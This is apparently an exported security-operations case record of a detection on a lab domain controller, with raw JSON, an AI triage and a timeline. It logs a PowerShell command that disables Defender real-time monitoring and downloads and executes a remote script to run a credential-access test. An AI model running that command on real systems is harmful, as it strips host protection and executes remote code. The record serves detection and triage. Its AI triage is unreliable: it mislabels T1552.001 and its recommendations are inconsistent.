high closed suspicious

๐Ÿท๏ธ Analyst Verdict Classification

SUSPICIOUS by analyst

🤖 AI Analysis

🔔 Detections (1)

Realtime Monitoring Tampering high
Rule: general.RealTime Monitoring Tampering
Hostname: df-labsdc01.dflabs.local · Sensor: e4a1c62d-4d1f-44...
Event Type: NEW_PROCESS
Confidence: 90% · Verdict: suspicious
Event Data:
BASE_ADDRESS:
140694944940032
COMMAND_LINE:
PowerShell.exe Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1552.001 -CheckPrereqs ; Invoke-AtomicTest T1552.001 -GetPrereqs ; Invoke-AtomicTest T1552.001
FILE_IS_SIGNED:
1
FILE_PATH:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
HASH:
de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c
MEMORY_USAGE:
238641152
PARENT:
{'BASE_ADDRESS': 140698856259584, 'COMMAND_LINE': 'cmd.exe /C C:\\Windows\\TEMP\\pldDCD7.tmp.bat T1552.001 ', 'FILE_IS_SIGNED': 1, 'FILE_PATH': 'C:\\Windows\\System32\\cmd.exe', 'HASH': '3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2', 'MEMORY_USAGE': 4489216, 'PARENT_ATOM': 'd2b1ecad7af81b32ac16ae0d69c2a7fe', 'PARENT_PROCESS_ID': 3496, 'PROCESS_ID': 9164, 'THIS_ATOM': '2eddc57635edafdc772cd43169c2a851', 'THREADS': 3, 'TIMESTAMP': 1774364752869, 'USER_NAME': 'NT AUTHORITY\\SYSTEM'}
PARENT_PROCESS_ID:
9164
PROCESS_ID:
2584
THREADS:
31
USER_NAME:
NT AUTHORITY\SYSTEM
IOCs: {'type': 'command_line', 'value': "Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing)"} {'type': 'url', 'value': 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1'} {'type': 'technique', 'value': 'T1552.001 (Exploit Public-Facing Application)'}
MITRE: T1552.001 T1059.004 T1567.003
Analyst Declaration:
📄 Raw Detection JSON
{
  "author": "ckeller@fusioncybersecurity.us",
  "cat": "Realtime Monitoring Tampering",
  "detect": {
    "event": {
      "BASE_ADDRESS": 140694944940032,
      "COMMAND_LINE": "PowerShell.exe  Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1552.001 -CheckPrereqs ; Invoke-AtomicTest T1552.001 -GetPrereqs ; Invoke-AtomicTest T1552.001 ",
      "FILE_IS_SIGNED": 1,
      "FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
      "HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
      "MEMORY_USAGE": 238641152,
      "PARENT": {
        "BASE_ADDRESS": 140698856259584,
        "COMMAND_LINE": "cmd.exe /C C:\\Windows\\TEMP\\pldDCD7.tmp.bat T1552.001 ",
        "FILE_IS_SIGNED": 1,
        "FILE_PATH": "C:\\Windows\\System32\\cmd.exe",
        "HASH": "3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2",
        "MEMORY_USAGE": 4489216,
        "PARENT_ATOM": "d2b1ecad7af81b32ac16ae0d69c2a7fe",
        "PARENT_PROCESS_ID": 3496,
        "PROCESS_ID": 9164,
        "THIS_ATOM": "2eddc57635edafdc772cd43169c2a851",
        "THREADS": 3,
        "TIMESTAMP": 1774364752869,
        "USER_NAME": "NT AUTHORITY\\SYSTEM"
      },
      "PARENT_PROCESS_ID": 9164,
      "PROCESS_ID": 2584,
      "THREADS": 31,
      "USER_NAME": "NT AUTHORITY\\SYSTEM"
    },
    "routing": {
      "arch": 2,
      "did": "",
      "event_id": "6741a4a8-eb86-4026-9e1a-0da01f2f48fe",
      "event_time": 1774364753471,
      "event_type": "NEW_PROCESS",
      "ext_ip": "67.60.122.240",
      "hostname": "df-labsdc01.dflabs.local",
      "iid": "47501359-645e-4049-906e-e6195da7afcf",
      "int_ip": "192.168.45.129",
      "latency": 3256,
      "moduleid": 2,
      "oid": "ad19afae-3759-4207-b06e-8648b225c455",
      "parent": "2eddc57635edafdc772cd43169c2a851",
      "plat": 268435456,
      "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
      "tags": [
        "domain-controller",
        "fusion-soc-alert",
        "fusion-soc-case",
        "fusion-soc-pulled",
        "fusion-soc-triage"
      ],
      "this": "0faf1760d8bf36ee150fa36d69c2a853"
    }
  },
  "detect_id": "2397328e-fee4-443e-8ca6-1a4169c2a854",
  "gen_time": 1774364756732,
  "link": "https://app.limacharlie.io/orgs/ad19afae-3759-4207-b06e-8648b225c455/sensors/e4a1c62d-4d1f-4472-bae4-43291246b4d4/timeline?time=1774364753\u0026selected=0faf1760d8bf36ee150fa36d69c2a853",
  "namespace": "general",
  "routing": {
    "arch": 2,
    "did": "",
    "event_id": "6741a4a8-eb86-4026-9e1a-0da01f2f48fe",
    "event_time": 1774364753471,
    "event_type": "NEW_PROCESS",
    "ext_ip": "67.60.122.240",
    "hostname": "df-labsdc01.dflabs.local",
    "iid": "47501359-645e-4049-906e-e6195da7afcf",
    "int_ip": "192.168.45.129",
    "latency": 3256,
    "moduleid": 2,
    "oid": "ad19afae-3759-4207-b06e-8648b225c455",
    "parent": "2eddc57635edafdc772cd43169c2a851",
    "plat": 268435456,
    "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
    "tags": [
      "domain-controller",
      "fusion-soc-alert",
      "fusion-soc-case",
      "fusion-soc-pulled",
      "fusion-soc-triage"
    ],
    "this": "0faf1760d8bf36ee150fa36d69c2a853"
  },
  "source": "ad19afae-3759-4207-b06e-8648b225c455.47501359-645e-4049-906e-e6195da7afcf.e4a1c62d-4d1f-4472-bae4-43291246b4d4.10000000.2",
  "source_rule": "general.RealTime Monitoring Tampering",
  "ts": 1774364756000
}
๐ŸŒ Threat Intel JSON
{
  "virustotal": {
    "malicious": false,
    "provider": "virustotal",
    "reputation": 73,
    "stats": {
      "confirmed-timeout": 0,
      "failure": 0,
      "harmless": 0,
      "malicious": 0,
      "suspicious": 0,
      "timeout": 0,
      "type-unsupported": 4,
      "undetected": 72
    }
  }
}
🤖 Triage JSON
{
  "confidence": 0.9,
  "false_positive_reason": null,
  "investigation_questions": [
    "What other processes were spawned by the parent cmd.exe process?",
    "Are there any scheduled tasks or startup items modified on this host?",
    "Was this SYSTEM account activity authorized through legitimate management tools?",
    "What is the network traffic pattern associated with this PowerShell session?"
  ],
  "ioc_analysis": "The process is running from its expected location (C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe) and is Microsoft-signed, which creates a false positive scenario for the file path itself. However, the command line arguments reveal malicious intent: disabling real-time monitoring, executing Invoke-Expression with an external URL, and installing Atomic Red Team tools. The parent process chain shows cmd.exe spawning PowerShell, indicating a deliberate attack chain rather than legitimate system maintenance.",
  "iocs_extracted": [
    {
      "type": "command_line",
      "value": "Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing)"
    },
    {
      "type": "url",
      "value": "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1"
    },
    {
      "type": "technique",
      "value": "T1552.001 (Exploit Public-Facing Application)"
    }
  ],
  "mitre_techniques": [
    "T1552.001",
    "T1059.004",
    "T1567.003"
  ],
  "recommended_actions": [
    "Manual analyst review required \u2014 AI models (split)",
    "Immediately isolate the host from the network to prevent lateral movement",
    "Block all outbound connections to GitHub and raw.githubusercontent.com at the firewall level",
    "Review and disable real-time monitoring settings on this endpoint",
    "Conduct forensic analysis of PowerShell execution history for this session",
    "Check for persistence mechanisms installed during this attack"
  ],
  "risk_score": 88,
  "severity": "high",
  "summary": "**Vote: SPLIT (1/2 -\u003e SUSPICIOUS)**\n\n### \u264a gemini-cli Analysis (Primary)\nFailed or timed out.\n\n---\n\n### \ud83e\udd16 qwen3.5:4b Analysis (Secondary)\n**Verdict:** true_positive | **Confidence:** 0.95\nThis event represents a highly suspicious PowerShell execution by the SYSTEM account that disables real-time monitoring and downloads malicious payloads from an external GitHub repository. The command line explicitly attempts to bypass security controls and execute code from an untrusted source.\n\n**IOC Analysis:** The process is running from its expected location (C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe) and is Microsoft-signed, which creates a false positive scenario for the file path itself. However, the command line arguments reveal malicious intent: disabling real-time monitoring, executing Invoke-Expression with an external URL, and installing Atomic Red Team tools. The parent process chain shows cmd.exe spawning PowerShell, indicating a deliberate attack chain rather than legitimate system maintenance.\n\n---\n\n### \ud83e\udd16 deepseek-r1:8b Analysis (Secondary)\n**Verdict:** suspicious | **Confidence:** 0.85\nThe detection involves a PowerShell process running from C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe with a malicious command line that disables real-time monitoring and installs potentially malicious tools. Despite the legitimate file path and signed hash, the behavior indicates a high-risk attack.\n\n**IOC Analysis:** FILE_PATH: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe is a legitimate Microsoft binary in its expected location, but the command line shows malicious intent. HASH: de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c is signed, but the behavior suggests it may be used for evasion. FILE_IS_SIGNED: 1 indicates a signature, but does not confirm legitimacy in this context.",
  "verdict": "suspicious",
  "voting": {
    "auto_action": "manual_review",
    "mode": "split",
    "total_models": 2,
    "vote_summary": [
      "qwen3.5:4b: true_positive (critical, 95% confidence)",
      "deepseek-r1:8b: suspicious (high, 85% confidence)"
    ],
    "votes": [
      {
        "confidence": 0.95,
        "model": "qwen3.5:4b",
        "verdict": "true_positive"
      },
      {
        "confidence": 0.85,
        "model": "deepseek-r1:8b",
        "verdict": "suspicious"
      }
    ],
    "winning_count": 1,
    "winning_verdict": "suspicious"
  }
}

โš™๏ธ Response Actions

| Action | Target | Status | Result |
|---|---|---|---|
| tag | e4a1c62d-4d1f-4472-bae4-43291246b4d4:fusionsoc-investigated | failed | 401 Client Error: Unauthorized for url: https://api.limacharlie.io/v1/e4a1c62d-4d1f-4472-bae4-43291246b4d4/tags?tags=fusionsoc-investigated |
| recommended | Manual analyst review required — AI models (split) | executed | General Activity Sweep: 0 events found |
| recommended | Immediately isolate the host from the network to prevent lateral movement | executed | Lateral Movement Investigation: 50 events found |
| recommended | Block all outbound connections to GitHub and raw.githubusercontent.com at the firewall level | executed | User Activity Investigation: 31 events found |
| recommended | Review and disable real-time monitoring settings on this endpoint | executed | General Activity Sweep: 0 events found |
| recommended | Conduct forensic analysis of PowerShell execution history for this session | executed | General Activity Sweep: 0 events found |
| recommended | Check for persistence mechanisms installed during this attack | executed | Persistence Check: 0 events found |

๐Ÿ“ Add Note

💬 Notes (7)

🤖 FusionSOC AI 2026-03-24T16:21

📜 Timeline

2026-03-24T17:30:27
analyst
Status changed: investigating → closed
2026-03-24T17:30:23
analyst
Analyst classified as Suspicious (SUSPICIOUS)
2026-03-24T16:21:45
FusionSOC AI
Status changed: investigating → investigating
2026-03-24T16:21:45
FusionSOC
Action recommended → executed: Persistence Check: 0 events found
2026-03-24T16:21:45
FusionSOC AI
Note by FusionSOC AI: ## 🔍 Persistence Check **Action:** Check for persistence mechanisms installed during this attack **Sensor:** `e4a1c62d-4...
2026-03-24T16:21:43
FusionSOC
Response action queued: recommended on Check for persistence mechanisms installed during this attack
2026-03-24T16:21:43
FusionSOC AI
Status changed: investigating → investigating
2026-03-24T16:21:43
FusionSOC
Action recommended → executed: General Activity Sweep: 0 events found
2026-03-24T16:21:43
FusionSOC AI
Note by FusionSOC AI: ## 🔍 General Activity Sweep **Action:** Conduct forensic analysis of PowerShell execution history for this session **Sen...
2026-03-24T16:21:43
FusionSOC
Response action queued: recommended on Conduct forensic analysis of PowerShell execution history for this session
2026-03-24T16:21:43
FusionSOC AI
Status changed: investigating → investigating
2026-03-24T16:21:43
FusionSOC
Action recommended → executed: General Activity Sweep: 0 events found
2026-03-24T16:21:43
FusionSOC AI
Note by FusionSOC AI: ## 🔍 General Activity Sweep **Action:** Review and disable real-time monitoring settings on this endpoint **Sensor:** `e...
2026-03-24T16:21:43
FusionSOC
Response action queued: recommended on Review and disable real-time monitoring settings on this endpoint
2026-03-24T16:21:43
FusionSOC AI
Status changed: investigating → investigating
2026-03-24T16:21:43
FusionSOC
Action recommended → executed: User Activity Investigation: 31 events found
2026-03-24T16:21:43
FusionSOC AI
Note by FusionSOC AI: ## 🔍 User Activity Investigation **Action:** Block all outbound connections to GitHub and raw.githubusercontent.com at t...
2026-03-24T16:21:42
FusionSOC
Response action queued: recommended on Block all outbound connections to GitHub and raw.githubusercontent.com at the firewall level
2026-03-24T16:21:42
FusionSOC AI
Status changed: investigating → investigating
2026-03-24T16:21:42
FusionSOC
Action recommended → executed: Lateral Movement Investigation: 50 events found
2026-03-24T16:21:42
FusionSOC AI
Note by FusionSOC AI: ## 🔍 Lateral Movement Investigation **Action:** Immediately isolate the host from the network to prevent lateral movemen...
2026-03-24T16:21:41
FusionSOC
Response action queued: recommended on Immediately isolate the host from the network to prevent lateral movement
2026-03-24T16:21:41
FusionSOC AI
Status changed: open → investigating
2026-03-24T16:21:41
FusionSOC
Action recommended → executed: General Activity Sweep: 0 events found
2026-03-24T16:21:41
FusionSOC AI
Note by FusionSOC AI: ## 🔍 General Activity Sweep **Action:** Manual analyst review required — AI models (split) **Sensor:** `e4a1c62d-4d1f-44...
2026-03-24T16:21:40
FusionSOC
Response action queued: recommended on Manual analyst review required — AI models (split)
2026-03-24T16:21:40
FusionSOC
Action tag → failed: 401 Client Error: Unauthorized for url: https://api.limacharlie.io/v1/e4a1c62d-4d1f-4472-bae4-43291246b4d4/tags?tags=fusionsoc-investigated
2026-03-24T16:21:40
FusionSOC
Response action queued: tag on e4a1c62d-4d1f-4472-bae4-43291246b4d4:fusionsoc-investigated
2026-03-24T16:21:39
FusionSOC AI
Detection 2397328e-fee4-443e-8ca6-1a4169c2a854 triaged as suspicious (high severity, confidence: 90%)
2026-03-24T16:21:39
FusionSOC AI
Case created from detection: general.RealTime Monitoring Tampering